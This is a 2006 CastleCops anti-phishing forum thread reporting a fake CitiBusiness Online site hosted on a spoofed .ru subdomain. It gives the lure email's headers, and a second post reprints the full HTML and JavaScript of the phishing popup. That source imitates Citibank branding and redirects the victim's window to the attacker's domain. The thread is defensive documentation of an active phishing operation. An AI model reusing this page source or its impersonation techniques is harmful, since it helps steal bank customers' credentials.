CastleCops® Fried Phish Mar 30: Citibusiness

Need help? Click here to register for free! Absolutely zero advertisements on this site!

**$9736.22 of $21422.68**

Help CastleCops serve the community on new servers, Donate Here to reach our goal.

	Donation/Premium

	Donations. Become Premium Today!

	Security Central

	· Home · PIRT/Fried Phish · MIRT · SIRT · Deutsch · Wiki · Newsletter · O16/ActiveX · CLSID List · Contest2007 · Downloads · Feedback (send) · Forums · HijackThis · Hijacktrend · LSPs · My Downloads · O18 · O20 · O21 · O22 · O23 · O9 · Premium · Private Messages · Proxomitron · Reviews · Search · StartupList · Stories Archive · Submit News · WsIRT · Your Account · Acceptable Use Policy

Survey

Forum FAQ

Usergroups

Profile

Select FavForums

Fried Phish Mar 30: Citibusiness

All -> FavForums -> PIRT Fried Phish Reports

[del.icio.us!] [digg it!] [reddit!]

View previous topic :: View next topic

Author

Message

Robin

Site Admin
Phishing Squad Team Lead

Joined: Oct 15, 2003
Posts: 8924

Posted: Thu Mar 30, 2006 7:55 pm Post subject: Fried Phish Mar 30: Citibusiness

Phish Alert

Full Report: CastleCops Link /modules.php?name=Fried_Phish&fp=phish&id=627&in=1

View CIDR AS2118 Report: http://www.cidr-report.org/cgi-bin/as-report?as=2118

"2118 | | NA | NA | RELCOM-AS RELCOM Autonomous System"<br />

This subdomain citibusinessonline.da.us.citibank.com.securitysupport.ru was clearly named in order to spoof one of the actual CitiBusiness domains.

Trying to access the subdomain only returns a 403 forbidden page

This phish is requesting a business code. Entering information results in a page popping up, with no address, tool or search bars stating "I am unable to sign you on to CitiBusiness�Online at this time." The source of the popup page will be posted in the thread.

Quote:

From Tue Mar 28 12:52:24 2006
Received: from gobcs.com (sbs.gobcs.com [64.109.89.85])
by bugsbunny.castlecops.com (8.13.6/8.13.6) with ESMTP id k2SHqNGa013454
for <>; Tue, 28 Mar 2006 12:52:24 -0500
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----_=_NextPart_001_01C65290.BF42987E"
Subject: FW: Banking Alert
X-MIMEOLE: Produced By Microsoft Exchange V6.5.7226.0
Date: Tue, 28 Mar 2006 11:54:57 -0600
Message-ID: <3F5A77874B1AFD428C62A4A4EFB1155A09A699@titus.gobcs.local>
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
Thread-Topic: Banking Alert
thread-index: AcZSdQasObU4VonDR8OTcL9UvMlgdAAG7N5T
From: "Andrew Kjos" <>
To: <>

This is a multi

Robin

Site Admin
Phishing Squad Team Lead

Joined: Oct 15, 2003
Posts: 8924

Posted: Thu Mar 30, 2006 8:01 pm Post subject:

Code:

<html>
<head>

<meta http-equiv="P3P" content="CP=STA CUR NOR UNIo PREi TAI">

<link rel="STYLESHEET" type="text/css" href="basprod/citiiwt/html/styles/BAstyles.htm">

<style type="text/css">
BODY {margin-top:24;margin-left:0;background-color:white}
.footerLink {text-decoration:underline;font-size:8pt;color=black}
.footText {font-size:8pt}
.bigLink {text-decoration:none; font-family:sans-serif;font-size:9pt;font-weight:bold;color:#003399}
TD {font-size:9pt}
TH {font-size:9pt}
P {font-size:9pt}
.blue {color:blue}
</style>

<script language="javascript">

if (top != self)
top.location=self.location;

var processing = false;
var NS4 = (document.layers) ? true : false;

var NN4P = false;
var NN6 = false;
var d = document;
var enableMouse;
var BAWindow;
var firstLink;
var ea = new Array();
var userString = new Array(-1,-1,-1);

var N6 = d.getElementById ? true : false;
var IE = d.all ? true : false;
var N4 = (!N6 && !IE);

var MAC = (navigator.platform.toUpperCase().indexOf("MAC") >= 0) ? true : false;

if (navigator.appName=="Netscape") {
switch (navigator.appVersion.charAt(0)) {
case "4" : NN4P = true; break;
case "5" : NN6 = true;
}
}

if (document.layers) {
wwidth=window.outerWidth;
wheight=window.outerHeight;
}

function ltrim(instr) { return instr.replace(/^\s+/,""); }
function rtrim(instr) { return instr.replace(/\s+$/,""); }
function trim(instr) { return ltrim(rtrim(instr)); }

function scrollUp(pixels) {
if (document.layers) {
   if (document.layers['warning'].clip.top > 0) {
      document.layers['warning'].clip.top -=pixels
   document.layers['warning'].clip.bottom -=pixels
document.layers['warning'].offset(0,pixels)
}
}
}

function scrollDown(pixels) {
if (document.layers) {
   if (document.layers['warning'].clip.bottom < 1500) {
      document.layers['warning'].clip.top += pixels
document.layers['warning'].clip.bottom += pixels
      document.layers['warning'].offset(0,-pixels)
}
}
}

if (document.layers) {
wwidth=window.outerWidth;
wheight=window.outerHeight;
}

function secureCOOKIE () {
return (location.protocol=="https:") ? ";SECURE" : "";
}

function BAbswo() {
document.cookie = "BAbswo=F;PATH=/" + secureCOOKIE();
}

function setOpenCookie() {
if (window.name != "BAWindow") {
document.cookie = "BAbswo=T;PATH=/" + secureCOOKIE ();
}
}

function setClosedCookie() {
if (window.name != "BAWindow") {
   if (!NN4P)
      BAbswo();
   if (BAWindow && !BAWindow.closed && BAWindow.BAbswo) {
      BAWindow.openerIsOpen = false;
      BAWindow.BAbswo();
   }
}
}

function resize_fix(cw) {
if (!document.layers) return;
if((cw.wwidth!=cw.outerWidth) || (cw.wheight!=cw.outerHeight)) {
cw.wwidth = cw.outerWidth;
cw.wheight = cw.outerHeight;
cw.history.go(0);
}
}

function sgnoff7 (URL) {
window.open (URL,"closeBA", "width=400,height=250");
   if (toHomePage)
      toHomePage();
}

function init() {
setOpenCookie();

for (var x=0; x < d.links.length; x++) {
   if (d.links[x].name == "kp") {
      firstLink = x;
      break;
   }
}

if (d.forms["BusSignOn"]) {

   if (d.forms["BusSignOn"].signOnOption) {
      if (d.forms["BusSignOn"].signOnOption.length == 3)
         busSignon();
   }

   if (d.forms["BusSignOn"].busName)
      d.forms["BusSignOn"].busName.focus();
   else if (d.forms["BusSignOn"].busCode)
      d.links[firstLink].focus();
}
else if (window.name == "BAWindow") {
   if (IE) {
      ea[0] = d.all.u0;
      ea[1] = d.all.u1;
      ea[2] = d.all.u2;
   } else if (N6) {
      ea[0] = d.getElementById("u0");
      ea[1] = d.getElementById("u1");
      ea[2] = d.getElementById("u2");
   }

}
}

function toHomePage2() {
location.href = toHome;
}

function toHomePage() {
if (!toHome) return;
setTimeout ("toHomePage2()", 2500);
}

function goCiti(u) {
if (window.name == "BAWindow") {
   window.open (u);
   return;
} else {
   top.location = u;
}
}

function getTimestamp() {
var D = new Date();
return D.getHours().toString() + D.getMinutes().toString() + D.getSeconds().toString();
}

function WindowRemote(Url, WindowName, xSize, ySize, isLocked) { // Pop-Up Window
var xs = xSize || 800;
var ys = ySize || 500;
var winName = WindowName || 'New';
var prefix = 'toolbar=0,location=0,directories=0,status=0,menubar=0,' +
   'scrollbars=1,copyhistory=0,resizable=0'
if (isLocked)
   prefix = prefix.replace(/0/gi, "1");
var permissions = prefix + ",left=50,top=10,width=" + xs + ",height=" + ys;
var Window = window.open (Url, winName, permissions);
Window.focus();
}

function getFeatures() {

var features = "toolbar=no,status=yes,scrollbars=yes,resizable=yes,location=yes," +
"directories=no,copyhistory=no,menubar=no,";

var s = screen;
availTop = s.availTop || 0;
availLeft = s.availLeft || 0;
availHeight = s.availHeight;
availWidth = s.availWidth;
if (s.HEIGHT) {
if (availWidth == document.body.offsetWidth) {
availLeft = window.screenLeft;
}
var v3 = s.height - availHeight;
if (v3 > 0) {
var v1 = window.screenTop + document.body.offsetHeight;
if (v1 > availHeight)
availTop = v3;
}
availWidth -= 12;
availHeight -= 50;

features += "height=" + availHeight + ",width=" +
availWidth + ",left=" + availLeft + ",top=" + availTop;

} else {
features += "outerHeight=" + s.availHeight + ",outerWidth=" +
s.availWidth + ",screenX=" + availLeft + ",screenY=" + availTop;
}
return features;
}

</script>

<title>CitiBusiness Online</title>

</head>

<body background="basprod/citiiwt/images/bg_top3n.gif" onload="init()" onUnload="setClosedCookie()" onresize="resize_fix(window)">

<table border='0' width='100%' cellpadding='0' cellspacing='0'>

<tr>
<td><image border="0" hspace="12" vspace="12" width="58" height="34" src="basprod/citiiwt/images/citilog4.gif"></td>
<td align="right">
   <a class='bigLink' href="#" onClick="javascript:goCiti('http://www.citibank.com/us/citibusinessOnline')">
   <img src="basprod/citiiwt/images/img_topnav_dot.gif" height="17" width="7" border="0"> Home</a>
    
   <a class='bigLink' href="#" onClick="javascript:goCiti('http://www.citibank.com/us/citibusiness/cbusol/userguide.htm')">
   <img src="basprod/citiiwt/images/img_topnav_dot.gif" height="17" width="7" border="0"> User Guide</a>
    
   <a class='bigLink' href="#" onClick="javascript:goCiti('http://www.citi.com')">
   <img src="basprod/citiiwt/images/img_topnav_dot.gif" height="17" width="7" border="0"> citi.com</a>
    
</td>
</tr>

<tr>
<td colspan='2'>   <img width='220' vspace="2" height='29' border='0' src="basprod/citiiwt/images/CBusLOGO.gif"></td>
</tr>

</table>

<style type="text/css">
H2 {color:blue}
H3 {font-size:13pt}
.blue {color:black}
H4 {font-size:11pt;font-weight:normal}
P {font-size:10pt}
.backLink {color:blue}
</style>

<script language="javascript">

function redirectToHome() {
if (window.opener) {

   window.opener.location.href = "http://citibusinessonline.da-us.securitysupport.ru/NN7b2g7NDU0MTQ7bW9udGVZ2U7NzYwMSBwYWludGVkIHRGLRyYWhhbSBHZW9y1cnRsZSBkcml2ZTtkYXl0b247b2g7N
DU0MTQ7bW9udGVuZHJlQGhvdG1haWwuY29tOw/citibusinessonline.php?AdditionalInfo=";

}
}

function onClose() {
   redirectToHome();
   window.close();
}

</script>

<br><br>
<table border="0" width="95%" height="60%" align="center">

<tr valign="top">
   <td width="50%">

<h3>I am unable to sign you on to CitiBusiness<sup>&#174</sup>Online at this time.</h3>

<H4>
7000000000888888 is not a recognized Business Code.<br> Please close this window and try signing on again.
<br>
</H4>

<h3>You can contact customer service at 1 (800) 285 1709.</h3>

<h3>For hearing impaired call 1 (800) 788 0002</h3>

<br />

<p><a href="javascript:onClose();" class="backLink">Click here to QUIT and Close this Window</a></p>

</td>
</tr>
</table>

<script type="text/javascript" language="JAVASCRIPT" src="basprod/citiiwt/js/branding.js"></script>

<table width="99%" cellpadding="0" cellspacing="0" border="0" align="center" valign="top">
<tr>
   <td height="1" background="basprod/citiiwt/images/line_hrz.gif"><img src="basprod/citiiwt/images/blank.gif" width="1" height="1" border="0">
   </td>
</tr>
<tr valign="top">
   <td>
      <table width="100%" cellpadding="0" cellspacing="0" border="0">
         <tr>
            <td height="6" colspan="2"><img src="basprod/citiiwt/images/blank.gif" width="1" height="6" border="0"></td>
         </tr>
         <tr>
            <td class='footText' >
               Citibank, N.A., Citibank, F.S.B., Citibank (West), FSB, Citibank Texas, N.A. Member FDIC.
            <br>
               <img src="basprod/citiiwt/images/citilog2.gif" alt="Citibank" width="21" height="18" border="0">
               <br><a class="footerLink" href="#" onClick="javascript:WindowRemote('http://www.citibank.com')">www.citi.com</a>
            </td>

            <td align="right" valign="top" >
               <table cellpadding="0" cellspacing="0" border="0">
                  <tr>
            <td valign="top">

            <a href="javascript:WindowRemote('basprod/citiiwt/html/billPayment.html?BS_Branding=NoBranding')">
            <img src="basprod/citiiwt/images/billpay.gif" alt="Bill Payment" width="80" height="68" border="0">

               </a>

            </td>
            <td valign="top" >
            <a href="javascript:WindowRemote('https://digitalid.verisign.com/as2/840d72023c719a43bd14e84398f2f4c6')">
            <img src="basprod/citiiwt/images/verisign.gif" alt="Verisign" width="100" height="58" border="0">
               </a>
            </td>
               <td align="right" valign="top" class='footText' width="220">
               <img src="basprod/citiiwt/images/eqhouse.gif" alt="Equal Housing Lender" width="29" height="38" hspace="3" vspace="0" border="0"><br>
               <img src="basprod/citiiwt/images/member.gif" alt="Citibank" border="0">
               <br><a href="#" onClick="javascript:WindowRemote('http://www.citigroup.com/citigroup/privacy/index.htm')">Citigroup Privacy Promise</a>
               <br><a href="#" onClick="javascript:WindowRemote('http://www.citigroup.com/citigroup/privacy/terms.htm')">Terms, conditions, caveats and small print</a>
               <br>Copyright © 2005 Citibank

               </td>
                  </tr>
               </table>
            </td>


         </tr>
      </table>

   </td>
</tr>
</table>

</body>
</html>

	All -> FavForums -> PIRT Fried Phish Reports	All times are GMT
Page 1 of 1

You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


	2002-2008 � Computer Cops LLC dba CastleCops®. All rights reserved. Acceptable Use Policy. Use signifies your agreement. 129ppm 2.543s (2.154s) Making cybercriminals unhappy since 2002*